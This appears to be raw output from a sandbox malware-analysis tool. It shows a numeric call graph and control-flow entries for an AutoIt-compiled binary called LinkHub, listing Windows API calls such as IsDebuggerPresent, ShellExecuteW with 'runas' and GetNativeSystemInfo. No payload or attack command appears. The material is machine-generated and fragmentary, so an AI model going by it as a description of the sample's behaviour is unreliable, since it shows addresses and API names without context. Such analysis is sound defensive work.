96700->96671 96700->96675 96701->96700 96716 267991 22 API calls 96701->96716 96717 271312 96703->96717 96706 270b7f DeleteCriticalSection 96706->96682 96707 270b6b 96707->96706 96708->96689 96711 207ac4 96710->96711 96712 207ab5 96710->96712 96711->96712 96713 207ac9 CloseHandle 96711->96713 96712->96676 96713->96712 96714->96684 96715->96691 96716->96701 96718 270b5a CloseHandle 96717->96718 96719 27131b InterlockedExchange 96717->96719 96718->96707 96719->96718 96720 27132f EnterCriticalSection TerminateThread WaitForSingleObject 96719->96720 96721 27135c CloseHandle 96720->96721 96722 271369 InterlockedExchange LeaveCriticalSection 96720->96722 96721->96722 96722->96718 96723 22076b 96724 220777 ___DestructExceptionObject 96723->96724 96753 220221 96724->96753 96726 22077e 96727 2208d1 96726->96727 96730 2207a8 96726->96730 96794 220baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 96727->96794 96729 2208d8 96787 2251c2 96729->96787 96739 2207e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 96730->96739 96764 2327ed 96730->96764 96737 2207c7 96743 220848 96739->96743 96790 22518a 38 API calls 2 library calls 96739->96790 96741 22084e 96776 20331b 96741->96776 96772 220cc9 96743->96772 96747 22086a 96747->96729 96748 22086e 96747->96748 96749 220877 96748->96749 96792 225165 28 API calls _abort 96748->96792 96793 2203b0 13 API calls 2 library calls 96749->96793 96752 22087f 96752->96737 96754 22022a 96753->96754 96796 220a08 IsProcessorFeaturePresent 96754->96796 96756 220236 96797 223004 10 API calls 3 library calls 96756->96797 96758 22023b 96763 22023f 96758->96763 96798 232687 96758->96798 96760 220256 96760->96726 96763->96726 96766 232804 96764->96766 96765 220dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96767 2207c1 96765->96767 96766->96765 96767->96737 96768 232791 96767->96768 96769 2327c0 96768->96769 96770 220dfc 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 96769->96770 96771 2327e9 96770->96771 96771->96739 96821 2226b0 96772->96821 96775 220cef 96775->96741 96777 203382 96776->96777 96778 203327 IsThemeActive 96776->96778 96791 220d02 GetModuleHandleW 96777->96791 96823 2252b3 96778->96823 96780 203352 96829 225319 96780->96829 96782 203359 96836 2032e6 SystemParametersInfoW SystemParametersInfoW 96782->96836 96784 203360 96837 20338b 96784->96837 96786 203368 SystemParametersInfoW 96786->96777 97882 224f3f 96787->97882 96790->96743 96791->96747 96792->96749 96793->96752 96794->96729 96796->96756 96797->96758 96802 23d576 96798->96802 96801 22302d 8 API calls 3 library calls 96801->96763 96803 23d593 96802->96803 96806 23d58f 96802->96806 96803->96806 96808 234eb8 96803->96808 96805 220248 96805->96760 96805->96801 96813 220dfc 96806->96813 96812 234ebf 96808->96812 96809 234f02 GetStdHandle 96809->96812 96810 234f6a 96810->96803 96811 234f15 GetFileType 96811->96812 96812->96809 96812->96810 96812->96811 96814 220e07 IsProcessorFeaturePresent 96813->96814 96815 220e05 96813->96815 96817 220fce 96814->96817 96815->96805 96820 220f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96817->96820 96819 2210b1 96819->96805 96820->96819 96822 220cdc GetStartupInfoW 96821->96822 96822->96775 96824 2252bf ___DestructExceptionObject 96823->96824 96886 2332d1 EnterCriticalSection 96824->96886 96826 2252ca pre_c_initialization 96887 22530a 96826->96887 96828 2252ff __wsopen_s 96828->96780 96830 22533f 96829->96830 96831 225325 96829->96831 96830->96782 96831->96830 96891 22f649 20 API calls __dosmaperr 96831->96891 96833 22532f 96892 232b5c 26 API calls __cftof 96833->96892 96835 22533a 96835->96782 96836->96784 96838 20339b __wsopen_s 96837->96838 96839 20bf73 22 API calls 96838->96839 96840 2033a7 GetCurrentDirectoryW 96839->96840 96893 204fd9 96840->96893 96842 2033ce IsDebuggerPresent 96843 243ca3 MessageBoxA 
96842->96843 96844 2033dc 96842->96844 96846 243cbb 96843->96846 96845 2033f0 96844->96845 96844->96846 96961 203a95 96845->96961 97011 204176 22 API calls 96846->97011 96850 203462 96855 243cec SetCurrentDirectoryW 96850->96855 96856 20346a 96850->96856 96851 20340f GetFullPathNameW 96852 208577 22 API calls 96851->96852 96853 20344e 96852->96853 96977 20425f 96853->96977 96855->96856 96857 203475 96856->96857 97012 261fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 96856->97012 96993 2034d3 7 API calls 96857->96993 96860 243d07 96860->96857 96863 243d19 96860->96863 97013 205594 96863->97013 96864 20347f 96870 203494 96864->96870 96997 20396b 96864->96997 96866 243d22 97020 20b329 96866->97020 96869 243d30 96872 243d5f 96869->96872 96873 243d38 96869->96873 96871 2034af 96870->96871 97007 203907 96870->97007 96875 2034b6 SetCurrentDirectoryW 96871->96875 96876 206b7c 22 API calls 96872->96876 97026 206b7c 96873->97026 96878 2034ca 96875->96878 96879 243d5b GetForegroundWindow ShellExecuteW 96876->96879 96878->96786 96883 243d90 96879->96883 96883->96871 96884 243d51 96885 206b7c 22 API calls 96884->96885 96885->96879 96886->96826 96890 233319 LeaveCriticalSection 96887->96890 96889 225311 96889->96828 96890->96889 96891->96833 96892->96835 96894 20bf73 22 API calls 96893->96894 96895 204fef 96894->96895 97036 2063d7 96895->97036 96897 20500d 97050 20bd57 96897->97050 96900 20bed9 22 API calls 96901 20502c 96900->96901 97056 20893c 96901->97056 96904 20b329 22 API calls 96905 205045 96904->96905 97059 20be2d 96905->97059 96907 205055 96908 20b329 22 API calls 96907->96908 96909 20507b 96908->96909 96910 20be2d 40 API calls 96909->96910 96911 20508a 96910->96911 96912 20bf73 22 API calls 96911->96912 96913 2050a8 96912->96913 97063 2051ca 96913->97063 96917 2050c2 96918 244b23 96917->96918 96919 2050cc 96917->96919 96921 2051ca 22 API calls 96918->96921 96920 224d98 40 API calls 96919->96920 96922 2050d7 96920->96922 96923 244b37 96921->96923 96922->96923 
96924 2050e1 96922->96924 96925 2051ca 22 API calls 96923->96925 96926 224d98 40 API calls 96924->96926 96927 244b53 96925->96927 96928 2050ec 96926->96928 96930 205594 24 API calls 96927->96930 96928->96927 96929 2050f6 96928->96929 96931 224d98 40 API calls 96929->96931 96932 244b76 96930->96932 96933 205101 96931->96933 96934 2051ca 22 API calls 96932->96934 96935 244b9f 96933->96935 96936 20510b 96933->96936 96938 244b82 96934->96938 96937 2051ca 22 API calls 96935->96937 96939 20512e 96936->96939 96940 20bed9 22 API calls 96936->96940 96941 244bbd 96937->96941 96943 20bed9 22 API calls 96938->96943 96942 244bda 96939->96942 97079 207e12 96939->97079 96944 205121 96940->96944 96945 20bed9 22 API calls 96941->96945 96947 244b90 96943->96947 96948 2051ca 22 API calls 96944->96948 96949 244bcb 96945->96949 96951 2051ca 22 API calls 96947->96951 96948->96939 96952 2051ca 22 API calls 96949->96952 96951->96935 96952->96942 96956 20893c 22 API calls 96958 205167 96956->96958 96957 208a60 22 API calls 96957->96958 96958->96956 96958->96957 96959 2051ab 96958->96959 96960 2051ca 22 API calls 96958->96960 96959->96842 96960->96958 96962 203aa2 __wsopen_s 96961->96962 96963 203abb 96962->96963 96964 2440da ___scrt_fastfail 96962->96964 97128 205851 96963->97128 96966 2440f6 GetOpenFileNameW 96964->96966 96968 244145 96966->96968 96970 208577 22 API calls 96968->96970 96972 24415a 96970->96972 96972->96972 96974 203ad9 97156 2062d5 96974->97156 96978 20426c __wsopen_s 96977->96978 97807 205b85 96978->97807 97822 203624 7 API calls 96993->97822 96995 20347a 96996 2035b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96995->96996 96996->96864 96998 203996 ___scrt_fastfail 96997->96998 97823 205f32 96998->97823 97002 2440cd Shell_NotifyIconW 97003 203a3a Shell_NotifyIconW 97827 2061a9 97003->97827 97004 203a1c 97004->97002 97004->97003 97006 203a50 97006->96870 97008 203969 97007->97008 97009 203919 ___scrt_fastfail 97007->97009 97008->96871 97010 203938 
Shell_NotifyIconW 97009->97010 97010->97008 97011->96850 97012->96860 97014 2422d0 __wsopen_s 97013->97014 97015 2055a1 GetModuleFileNameW 97014->97015 97016 20b329 22 API calls 97015->97016 97017 2055c7 97016->97017 97018 205851 23 API calls 97017->97018 97019 2055d1 97018->97019 97019->96866 97021 20b338 _wcslen 97020->97021 97022 22017b 22 API calls 97021->97022 97023 20b360 __fread_nolock 97022->97023 97024 22014b 22 API calls 97023->97024 97025 20b376 97024->97025 97025->96869 97027 206b93 97026->97027 97028 2457fe 97026->97028 97867 206ba4 97027->97867 97030 22014b 22 API calls 97028->97030 97032 245808 _wcslen 97030->97032 97031 206b9e 97035 207bb5 22 API calls 97031->97035 97033 22017b 22 API calls 97032->97033 97034 245841 __fread_nolock 97033->97034 97035->96884 97037 2063e4 __wsopen_s 97036->97037 97038 208577 22 API calls 97037->97038 97039 206416 97037->97039 97038->97039 97044 20644c 97039->97044 97101 20655e 97039->97101 97041 20655e 22 API calls 97041->97044 97042 20651a 97043 20654f 97042->97043 97045 20b329 22 API calls 97042->97045 97043->96897 97044->97041 97044->97042 97047 20b329 22 API calls 97044->97047 97104 206a7c 97044->97104 97046 206543 97045->97046 97048 206a7c 22 API calls 97046->97048 97047->97044 97048->97043 97051 20bd71 97050->97051 97055 205021 97050->97055 97052 22014b 22 API calls 97051->97052 97053 20bd7b 97052->97053 97054 22017b 22 API calls 97053->97054 97054->97055 97055->96900 97057 22014b 22 API calls 97056->97057 97058 205038 97057->97058 97058->96904 97060 20be38 97059->97060 97061 20be67 97060->97061 97110 20bfa5 40 API calls 97060->97110 97061->96907 97064 2051f2 97063->97064 97065 2051d4 97063->97065 97067 208577 22 API calls 97064->97067 97066 2050b4 97065->97066 97068 20bed9 22 API calls 97065->97068 97069 224d98 97066->97069 97067->97066 97068->97066 97070 224da6 97069->97070 97071 224e1b 97069->97071 97074 224dcb 97070->97074 97111 22f649 20 API calls __dosmaperr 97070->97111 97113 224e2d 40 API calls 3 library 
calls 97071->97113 97073 224e28 97073->96917 97074->96917 97076 224db2 97112 232b5c 26 API calls __cftof 97076->97112 97078 224dbd 97078->96917 97080 207e1a 97079->97080 97081 22014b 22 API calls 97080->97081 97082 207e28 97081->97082 97114 208445 97082->97114 97085 208470 97117 20c760 97085->97117 97087 208480 97088 22017b 22 API calls 97087->97088 97089 20514c 97087->97089 97088->97089 97090 208a60 97089->97090 97091 208a76 97090->97091 97092 208a80 97091->97092 97093 246737 97091->97093 97094 246744 97092->97094 97097 208b9b 97092->97097 97099 208b94 97092->97099 97126 21b7a2 22 API calls 97093->97126 97127 20b4c8 22 API calls 97094->97127 97097->96958 97098 246762 97098->97098 97100 22014b 22 API calls 97099->97100 97100->97097 97102 20c2c9 22 API calls 97101->97102 97103 206569 97102->97103 97103->97039 97105 206a8b 97104->97105 97109 206aac __fread_nolock 97104->97109 97107 22017b 22 API calls 97105->97107 97106 22014b 22 API calls 97108 206abf 97106->97108 97107->97109 97108->97044 97109->97106 97110->97061 97111->97076 97112->97078 97113->97073 97115 22014b 22 API calls 97114->97115 97116 20513e 97115->97116 97116->97085 97118 20c76b 97117->97118 97119 251285 97118->97119 97123 20c773 ISource 97118->97123 97120 22014b 22 API calls 97119->97120 97122 251291 97120->97122 97121 20c77a 97121->97087 97123->97121 97125 20c7e0 22 API calls ISource 97123->97125 97125->97123 97126->97094 97127->97098 97186 2422d0 97128->97186 97131 205898 97134 20bd57 22 API calls 97131->97134 97132 20587d 97133 208577 22 API calls 97132->97133 97135 205889 97133->97135 97134->97135 97188 2055dc 97135->97188 97138 203a57 97139 2422d0 __wsopen_s 97138->97139 97140 203a64 GetLongPathNameW 97139->97140 97141 208577 22 API calls 97140->97141 97142 203a8c 97141->97142 97143 2053f2 97142->97143 97144 20bf73 22 API calls 97143->97144 97145 205404 97144->97145 97146 205851 23 API calls 97145->97146 97147 20540f 97146->97147 97148 20541a 97147->97148 97151 244d5b 97147->97151 97150 206a7c 22 
API calls 97148->97150 97152 205426 97150->97152 97153 244d7d 97151->97153 97198 21e36b 41 API calls 97151->97198 97192 201340 97152->97192 97155 205439 97155->96974 97199 206679 97156->97199 97159 245336 97324 2736b8 97159->97324 97160 206679 94 API calls 97162 20630e 97160->97162 97162->97159 97164 206316 97162->97164 97163 245347 97165 245368 97163->97165 97166 24534b 97163->97166 97168 206322 97164->97168 97169 245353 97164->97169 97167 22017b 22 API calls 97165->97167 97373 2066e7 97166->97373 97185 2453ad 97167->97185 97221 203b39 97168->97221 97379 26e30e 82 API calls 97169->97379 97173 203407 97173->96850 97173->96851 97174 245361 97174->97165 97175 24555e 97180 245566 97175->97180 97176 2066e7 68 API calls 97176->97180 97180->97176 97381 26a215 82 API calls __wsopen_s 97180->97381 97182 20b329 22 API calls 97182->97185 97185->97175 97185->97180 97185->97182 97350 269ff8 97185->97350 97353 271519 97185->97353 97359 20bba9 97185->97359 97367 205d21 97185->97367 97380 269f27 42 API calls _wcslen 97185->97380 97187 20585e GetFullPathNameW 97186->97187 97187->97131 97187->97132 97189 2055ea 97188->97189 97190 20adf4 22 API calls 97189->97190 97191 203ac4 97190->97191 97191->97138 97193 201352 97192->97193 97197 201371 __fread_nolock 97192->97197 97195 22017b 22 API calls 97193->97195 97194 22014b 22 API calls 97196 201388 97194->97196 97195->97197 97196->97155 97197->97194 97198->97151 97382 20663e LoadLibraryA 97199->97382 97204 2066a4 LoadLibraryExW 97390 206607 LoadLibraryA 97204->97390 97205 245648 97207 2066e7 68 API calls 97205->97207 97208 24564f 97207->97208 97210 206607 3 API calls 97208->97210 97212 245657 97210->97212 97411 20684a 97212->97411 97213 2066ce 97213->97212 97214 2066da 97213->97214 97216 2066e7 68 API calls 97214->97216 97218 2062fa 97216->97218 97218->97159 97218->97160 97220 24567e 97222 203b62 97221->97222 97223 24415f 97221->97223 97225 22017b 22 API calls 97222->97225 97672 26a215 82 API calls __wsopen_s 97223->97672 97227 203b86 
97225->97227 97226 203bec 97232 203bfa 97226->97232 97234 244179 97226->97234 97673 26d5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97226->97673 97228 207aab CloseHandle 97227->97228 97229 203b94 97228->97229 97230 20bf73 22 API calls 97229->97230 97231 203b9d 97230->97231 97233 207aab CloseHandle 97231->97233 97235 20bf73 22 API calls 97232->97235 97237 203ba6 97233->97237 97234->97226 97234->97232 97236 203c06 97235->97236 97646 203ae9 97236->97646 97240 207aab CloseHandle 97237->97240 97243 203baf 97240->97243 97241 2441d5 97241->97232 97660 206fa2 SetFilePointerEx SetFilePointerEx SetFilePointerEx CreateFileW CreateFileW 97243->97660 97244 20bf73 22 API calls 97246 203c1e 97244->97246 97248 205851 23 API calls 97246->97248 97247 203bc9 97249 203bd1 97247->97249 97250 244591 97247->97250 97251 203c2c 97248->97251 97661 206c5f 27 API calls ISource 97249->97661 97685 26a215 82 API calls __wsopen_s 97250->97685 97651 203b1c 97251->97651 97254 2445a6 97254->97254 97258 203be3 97662 206c48 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97258->97662 97261 203c6f 97263 20bf73 22 API calls 97261->97263 97262 2441eb 97264 207aab CloseHandle 97262->97264 97265 203c78 97263->97265 97266 2441f4 97264->97266 97267 20bf73 22 API calls 97265->97267 97268 206679 94 API calls 97266->97268 97269 203c81 97267->97269 97271 24421c 97268->97271 97663 20568e 22 API calls 97269->97663 97273 244528 97271->97273 97276 2736b8 80 API calls 97271->97276 97272 203c98 97664 207bb5 22 API calls 97272->97664 97682 26a215 82 API calls __wsopen_s 97273->97682 97278 24423b 97276->97278 97277 203ca9 SetCurrentDirectoryW 97283 203cbc 97277->97283 97279 2066e7 68 API calls 97278->97279 97280 244249 97279->97280 97280->97273 97281 244251 97280->97281 97282 22014b 22 API calls 97281->97282 97284 244279 97282->97284 97285 22017b 22 API calls 97283->97285 97290 20bba9 22 API calls 97284->97290 97286 203ccf 97285->97286 97288 20423c 22 API calls 97286->97288 97287 207aab 
CloseHandle 97289 203e5c 97287->97289 97322 203cda ISource _wcslen 97288->97322 97291 207aab CloseHandle 97289->97291 97319 2442ba 97290->97319 97295 203e6e 97291->97295 97292 244495 97676 27148b 97292->97676 97293 203e07 97294 207aab CloseHandle 97293->97294 97297 203e10 SetCurrentDirectoryW 97294->97297 97295->97173 97309 203e2a ISource 97297->97309 97300 2444bb 97680 264ad3 22 API calls __fread_nolock 97300->97680 97302 20bba9 22 API calls 97302->97319 97304 244574 97684 26a215 82 API calls __wsopen_s 97304->97684 97307 244588 97307->97293 97309->97287 97310 269ff8 22 API calls 97310->97319 97312 20b329 22 API calls 97312->97322 97314 20b329 22 API calls 97314->97319 97316 271519 22 API calls 97316->97319 97318 2444fd 97681 26a215 82 API calls __wsopen_s 97318->97681 97319->97292 97319->97302 97319->97310 97319->97314 97319->97316 97319->97318 97674 269f27 42 API calls _wcslen 97319->97674 97675 204176 22 API calls 97319->97675 97321 244516 97321->97309 97322->97293 97322->97304 97322->97312 97665 20ae4e 33 API calls 97322->97665 97666 204129 GetStringTypeW 97322->97666 97667 204089 40 API calls 97322->97667 97668 20404e GetStringTypeW _wcslen 97322->97668 97669 226735 GetStringTypeW 97322->97669 97670 203eab 136 API calls 2 library calls 97322->97670 97671 204176 22 API calls 97322->97671 97683 269ec0 22 API calls _wcslen 97322->97683 97325 2736d4 97324->97325 97326 206874 64 API calls 97325->97326 97327 2736e8 97326->97327 97694 273827 97327->97694 97330 20684a 40 API calls 97331 273717 97330->97331 97332 20684a 40 API calls 97331->97332 97333 273727 97332->97333 97334 20684a 40 API calls 97333->97334 97335 273742 97334->97335 97336 20684a 40 API calls 97335->97336 97337 27375d 97336->97337 97338 206874 64 API calls 97337->97338 97339 273774 97338->97339 97340 22ed7c ___std_exception_copy 21 API calls 97339->97340 97341 27377b 97340->97341 97342 22ed7c ___std_exception_copy 21 API calls 97341->97342 97343 273785 97342->97343 97344 20684a 40 API calls 
97343->97344 97345 273799 97344->97345 97346 2732bd 27 API calls 97345->97346 97348 2737af 97346->97348 97347 273700 97347->97163 97348->97347 97700 272c8d 97348->97700 97351 22017b 22 API calls 97350->97351 97352 26a028 __fread_nolock 97351->97352 97352->97185 97352->97352 97354 271524 97353->97354 97355 22014b 22 API calls 97354->97355 97356 27153b 97355->97356 97357 20b329 22 API calls 97356->97357 97358 271546 97357->97358 97358->97185 97360 20bc33 97359->97360 97364 20bbb9 __fread_nolock 97359->97364 97363 22017b 22 API calls 97360->97363 97361 22014b 22 API calls 97362 20bbc0 97361->97362 97365 22014b 22 API calls 97362->97365 97366 20bbde 97362->97366 97363->97364 97364->97361 97365->97366 97366->97185 97368 205d34 97367->97368 97372 205dd8 97367->97372 97370 22017b 22 API calls 97368->97370 97371 205d66 97368->97371 97369 22014b 22 API calls 97369->97371 97370->97371 97371->97369 97371->97372 97372->97185 97374 2066f1 97373->97374 97375 2066f8 97373->97375 97376 22e9e8 67 API calls 97374->97376 97377 2456a4 FreeLibrary 97375->97377 97378 20670f 97375->97378 97376->97375 97378->97169 97379->97174 97380->97185 97381->97180 97383 206674 97382->97383 97384 206656 GetProcAddress 97382->97384 97387 22e95b 97383->97387 97385 206666 97384->97385 97385->97383 97386 20666d FreeLibrary 97385->97386 97386->97383 97419 22e89a 97387->97419 97389 206698 97389->97204 97389->97205 97391 20663b 97390->97391 97392 20661c GetProcAddress 97390->97392 97395 206720 97391->97395 97393 20662c 97392->97393 97393->97391 97394 206634 FreeLibrary 97393->97394 97394->97391 97396 22017b 22 API calls 97395->97396 97397 206735 97396->97397 97479 20423c 97397->97479 97399 206741 __fread_nolock 97400 2456c2 97399->97400 97404 20677c 97399->97404 97487 273a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 97399->97487 97488 273a92 74 API calls 97400->97488 97403 20684a 40 API calls 97403->97404 97404->97403 97405 245706 97404->97405 97406 206874 64 API calls 
97404->97406 97408 206810 ISource 97404->97408 97482 206874 97405->97482 97406->97404 97408->97213 97410 20684a 40 API calls 97410->97408 97412 245760 97411->97412 97413 20685c 97411->97413 97520 22ec34 97413->97520 97416 2732bd 97629 27310d 97416->97629 97418 2732d8 97418->97220 97422 22e8a6 ___DestructExceptionObject 97419->97422 97420 22e8b4 97444 22f649 20 API calls __dosmaperr 97420->97444 97422->97420 97424 22e8e4 97422->97424 97423 22e8b9 97445 232b5c 26 API calls __cftof 97423->97445 97426 22e8f6 97424->97426 97427 22e8e9 97424->97427 97436 2383e1 97426->97436 97446 22f649 20 API calls __dosmaperr 97427->97446 97430 22e8ff 97431 22e912 97430->97431 97432 22e905 97430->97432 97448 22e944 LeaveCriticalSection __fread_nolock 97431->97448 97447 22f649 20 API calls __dosmaperr 97432->97447 97434 22e8c4 __wsopen_s 97434->97389 97437 2383ed ___DestructExceptionObject 97436->97437 97449 2332d1 EnterCriticalSection 97437->97449 97439 2383fb 97450 23847b 97439->97450 97443 23842c __wsopen_s 97443->97430 97444->97423 97445->97434 97446->97434 97447->97434 97448->97434 97449->97439 97451 23849e 97450->97451 97452 2384f7 97451->97452 97458 238408 97451->97458 97467 2294fd EnterCriticalSection 97451->97467 97468 229511 LeaveCriticalSection 97451->97468 97469 234ff0 20 API calls 2 library calls 97452->97469 97454 238500 97470 232d38 97454->97470 97457 238509 97457->97458 97476 233778 11 API calls 2 library calls 97457->97476 97464 238437 97458->97464 97461 238528 97477 2294fd EnterCriticalSection 97461->97477 97463 23853b 97463->97458 97478 233319 LeaveCriticalSection 97464->97478 97466 23843e 97466->97443 97467->97451 97468->97451 97469->97454 97471 232d43 RtlFreeHeap 97470->97471 97475 232d6c _free 97470->97475 97472 232d58 97471->97472 97471->97475 97473 22f649 _free 18 API calls 97472->97473 97474 232d5e GetLastError 97473->97474 97474->97475 97475->97457 97476->97461 97477->97463 97478->97466 97480 22014b 22 API calls 97479->97480 97481 20424e 97480->97481 
97481->97399 97483 206883 97482->97483 97484 245780 97482->97484 97489 22f053 97483->97489 97487->97400 97488->97404 97492 22ee1a 97489->97492 97491 206891 97491->97410 97493 22ee26 ___DestructExceptionObject 97492->97493 97494 22ee32 97493->97494 97496 22ee58 97493->97496 97517 22f649 20 API calls __dosmaperr 97494->97517 97505 2294fd EnterCriticalSection 97496->97505 97497 22ee37 97518 232b5c 26 API calls __cftof 97497->97518 97499 22ee64 97506 22ef7a 97499->97506 97502 22ee78 97519 22ee97 LeaveCriticalSection __fread_nolock 97502->97519 97504 22ee42 __wsopen_s 97504->97491 97505->97499 97507 22ef9c 97506->97507 97508 22ef8c 97506->97508 97510 22eea1 28 API calls 97507->97510 97509 22f649 _free 20 API calls 97508->97509 97511 22ef91 97509->97511 97512 22efbf 97510->97512 97511->97502 97513 22df7b 62 API calls 97512->97513 97516 22f03e 97512->97516 97514 22efe6 97513->97514 97515 2397a4 __fread_nolock 28 API calls 97514->97515 97515->97516 97516->97502 97517->97497 97518->97504 97519->97504 97523 22ec51 97520->97523 97522 20686d 97522->97416 97524 22ec5d ___DestructExceptionObject 97523->97524 97525 22ec70 ___scrt_fastfail 97524->97525 97526 22ec9d 97524->97526 97527 22ec95 __wsopen_s 97524->97527 97550 22f649 20 API calls __dosmaperr 97525->97550 97536 2294fd EnterCriticalSection 97526->97536 97527->97522 97530 22eca7 97537 22ea68 97530->97537 97531 22ec8a 97551 232b5c 26 API calls __cftof 97531->97551 97536->97530 97539 22ea7a ___scrt_fastfail 97537->97539 97543 22ea97 97537->97543 97538 22ea87 97625 22f649 20 API calls __dosmaperr 97538->97625 97539->97538 97539->97543 97545 22eada __fread_nolock 97539->97545 97541 22ea8c 97626 232b5c 26 API calls __cftof 97541->97626 97552 22ecdc LeaveCriticalSection __fread_nolock 97543->97552 97544 22ebf6 ___scrt_fastfail 97628 22f649 20 API calls __dosmaperr 97544->97628 97545->97543 97545->97544 97553 22dcc5 97545->97553 97560 2390c5 97545->97560 97627 22d2e8 26 API calls 4 library calls 97545->97627 97550->97531 

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        APIs
                                                                                        • GetVersionExW.KERNEL32(?), ref: 00205FF7
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                        • GetCurrentProcess.KERNEL32(?,0029DC2C,00000000,?,?), ref: 00206123
                                                                                        • IsWow64Process.KERNEL32(00000000,?,?), ref: 0020612A
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00206155
                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00206167
                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00206175
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?), ref: 0020617C
                                                                                        • GetSystemInfo.KERNEL32(?,?,?), ref: 002061A1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000024.00000002.2112868306.0000000000201000.00000020.00000001.01000000.00000012.sdmp, Offset: 00200000, based on PE: true
                                                                                        • Associated: 00000024.00000002.2112846436.0000000000200000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.000000000029D000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112924055.00000000002C3000.00000002.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2112980189.00000000002CD000.00000004.00000001.01000000.00000012.sdmp
                                                                                        • Associated: 00000024.00000002.2113005251.00000000002D5000.00000002.00000001.01000000.00000012.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_36_2_200000_LinkHub.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                        • API String ID: 3290436268-3101561225
                                                                                        • Opcode ID: bc11a7fea0a82dd14580b0e9f82abedba1b321b847d72d834251e12182ff548f
                                                                                        • Instruction ID: bddf1da329d6c5816ffbe709b5beef9c5c9ac0f14e7a2e7e37d219668a08b3c5
                                                                                        • Opcode Fuzzy Hash: bc11a7fea0a82dd14580b0e9f82abedba1b321b847d72d834251e12182ff548f
                                                                                        • Instruction Fuzzy Hash: 64A16E32C2B3D4CBC796CB68BC4D1957FA46B36300B0868DBE48597263C2694DACDB71

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00203368,?), ref: 002033BB
                                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00203368,?), ref: 002033CE
                                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?,002D2418,002D2400,?,?,?,?,?,?,00203368,?), ref: 0020343A
                                                                                          • Part of subcall function 00208577: _wcslen.LIBCMT ref: 0020858A
                                                                                          • Part of subcall function 0020425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00203462,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002042A0
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,00000001,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 002034BB
                                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00243CB0
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,002D2418,?,?,?,?,?,?,?,00203368,?), ref: 00243CF1
                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,002C31F4,002D2418,?,?,?,?,?,?,?,00203368), ref: 00243D7A
                                                                                        • ShellExecuteW.SHELL32(00000000,?,?), ref: 00243D81
                                                                                          • Part of subcall function 002034D3: GetSysColorBrush.USER32(0000000F), ref: 002034DE
                                                                                          • Part of subcall function 002034D3: LoadCursorW.USER32(00000000,00007F00), ref: 002034ED
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(00000063), ref: 00203503
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(000000A4), ref: 00203515
                                                                                          • Part of subcall function 002034D3: LoadIconW.USER32(000000A2), ref: 00203527
                                                                                          • Part of subcall function 002034D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0020353F
                                                                                          • Part of subcall function 002034D3: RegisterClassExW.USER32(?), ref: 00203590
                                                                                          • Part of subcall function 002035B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002035E1
                                                                                          • Part of subcall function 002035B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00203602
                                                                                          • Part of subcall function 002035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 00203616
                                                                                          • Part of subcall function 002035B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00203368,?), ref: 0020361F
                                                                                          • Part of subcall function 0020396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203A3C
                                                                                        Strings
                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00243CAA
                                                                                        • AutoIt, xrefs: 00243CA5
                                                                                        • runas, xrefs: 00243D75
                                                                                        • 0$-, xrefs: 00203495
                                                                                        Similarity
                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                        • String ID: 0$-$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                        • API String ID: 683915450-2053971045
                                                                                        • Opcode ID: 16d29208b96f05c7ab15de17b19f1ab14310fc7e32a64d87837c034b0fac2848
